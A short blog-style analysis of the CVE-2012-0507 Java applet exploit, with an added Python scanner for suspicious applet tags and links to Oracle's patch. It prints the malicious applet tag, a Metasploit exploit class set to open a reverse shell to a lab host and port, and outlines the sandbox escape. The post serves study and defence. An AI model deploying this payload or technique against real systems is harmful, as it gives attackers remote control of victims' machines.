CVE-2012-0507: A Brief Analysis

Not long ago (really, not long ago) the CVE-2012-0507 vulnerability was disclosed. It is a vulnerability affecting Java applets.

Even now, malware exploiting this vulnerability keeps turning up.

The malware trend analysis reports published by Bitscan (빛스캔) still mention this vulnerability.

Related article: http://www.dailysecu.com/news_view.php?article_id=2243

Malware using this and other vulnerabilities will probably keep appearing for a while, so I am writing up this analysis in the hope that people who read it will at least patch.

When you visit a page with malware exploiting this vulnerability embedded in it, a dialog asking whether to run a Java applet appears, as shown below, and the page contains code like the following.

[Figure 1 - Java applet run prompt]

<html><head></head><body><applet archive="dvTKbJP.jar" code="msf.x.Exploit.class" width="1" height="1"><param name="data" value=""/><param name="jar" value="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"/><param name="lhost" value="192.168.6.131"/><param name="lport" value="4444"/></applet></body></html>

The attack flow, in brief: the shellcode on the page is passed into the Exploit class in dvTKbJP.jar and executed there. Of course, this particular shellcode is a reverse_tcp shellcode I made myself.
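As an added example that is not part of the original post, here is a small Python scanner that flags applet tags with the traits visible above: hidden 1x1 dimensions, a Metasploit-style class name, reverse-connect lhost/lport parameters, and a second jar embedded inline in a param. The sample HTML is constructed to resemble the page's tag with a placeholder in place of the embedded jar value, and the class and function names are my own.

```python
from html.parser import HTMLParser

# Constructed sample modelled on the applet tag from the analysed page;
# the inline jar payload is replaced with a placeholder string.
SAMPLE_HTML = (
    '<html><head></head><body>'
    '<applet archive="dvTKbJP.jar" code="msf.x.Exploit.class" width="1" height="1">'
    '<param name="data" value=""/>'
    '<param name="jar" value="PLACEHOLDER_EMBEDDED_JAR"/>'
    '<param name="lhost" value="192.168.6.131"/>'
    '<param name="lport" value="4444"/>'
    '</applet></body></html>'
)


class AppletCollector(HTMLParser):
    """Collect each <applet> element with its attributes and nested <param> pairs."""

    def __init__(self):
        super().__init__()
        self.applets = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        # HTMLParser lowercases tag and attribute names; values may be None
        attrs = {name: (value or "") for name, value in attrs}
        if tag == "applet":
            self._current = {"attrs": attrs, "params": {}}
            self.applets.append(self._current)
        elif tag == "param" and self._current is not None:
            self._current["params"][attrs.get("name", "").lower()] = attrs.get("value", "")

    def handle_endtag(self, tag):
        if tag == "applet":
            self._current = None


def find_suspicious_applets(html):
    """Return a list of (archive, reasons) for applets that look like exploit loaders."""
    parser = AppletCollector()
    parser.feed(html)
    findings = []
    for applet in parser.applets:
        a, p = applet["attrs"], applet["params"]
        reasons = []
        if a.get("width") == "1" and a.get("height") == "1":
            reasons.append("hidden 1x1 applet")  # nothing legitimate to render
        if a.get("code", "").startswith("msf."):
            reasons.append("Metasploit-style class name")
        if {"lhost", "lport"} <= set(p):
            reasons.append("reverse-connect parameters lhost/lport")
        if p.get("jar"):
            reasons.append("second jar embedded inline in a <param>")
        if reasons:
            findings.append((a.get("archive", ""), reasons))
    return findings
```

Run find_suspicious_applets over fetched page bodies or proxy logs; a single matching reason is worth a look, and all four together is the pattern shown on this page.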


Now it is time to look at what is inside dvTKbJP.jar.

First, let's see what this vulnerability actually exploits.

The vulnerability abuses the AtomicReferenceArray class provided by Java. The class lets the arguments passed to it (atomic variables) be handled as an array; during that array handling, deserialization is used to corrupt memory so that the sandbox is disabled and the malicious code runs outside it. Quite clever, isn't it?

What matters even more is that the deserialization itself does not step outside normal program logic, so the class ends up being referenced as a perfectly normal reference.

Now let's look at the code. Compared to how deep the vulnerability is, the code is really simple.

[Vulnerability analysis]

1. When you visit a page with malware exploiting the vulnerability embedded in it, the jar file and the shellcode are combined and executed. Once it runs, the following code in the jar's Exploit class is executed.

[Figure 2 - Creating an AtomicReferenceArray() object]

2. Once the object is created, a ClassLoader object is created and set into the AtomicReferenceArray().

[Figure 3 - Setting the ClassLoader]

3. After that, various auxiliary values are set and the doWork() method of Help.class is called.

[Figure 4 - Setting auxiliary values]

4. The doWork() method defines a new class, and that defined class downloads the shellcode and executes it.

[Figure 5 - Part of the doWork method]

The overall flow, drawn as a diagram, looks like this.

[Figure 6 - Overall flow diagram]

The diagram is not very detailed, so it may be briefly confusing.

Exploit.class and Help.class are classes in the jar file and run inside the sandbox. The class defined arbitrarily via defineClass runs outside the sandbox.

Since this is a serious vulnerability, anyone reading this should go to the links below and either apply the patch or update to the latest version.

Vulnerability patch: http://www.oracle.com/technetwork/topics/security/javacpufeb2012-366318.html

Latest version: http://www.oracle.com/technetwork/java/javase/downloads/index.html